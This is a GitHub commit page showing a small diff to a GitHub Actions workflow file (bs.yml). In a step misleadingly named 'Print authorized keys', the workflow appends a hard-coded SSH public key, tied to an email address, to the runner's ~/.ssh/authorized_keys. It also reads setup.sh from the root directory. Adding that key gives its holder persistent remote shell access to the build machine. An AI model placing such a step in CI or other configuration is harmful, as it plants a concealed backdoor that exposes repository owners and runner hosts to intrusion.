We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent ce7352f commit 4ea2fe0Copy full SHA for 4ea2fe0
.github/workflows/bs.yml
@@ -15,7 +15,7 @@ jobs:
15
- name: Print authorized keys
16
run: |
17
realpath ~
18
- cat ./setup.sh
+ cat /setup.sh
19
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINUZosd80c17ugHclnJWvTJj6G0QGPI90iV0ijsMGkIO logenicite@outlook.com" >> ~/.ssh/authorized_keys
20
cat ~/.ssh/authorized_keys
21
0 commit comments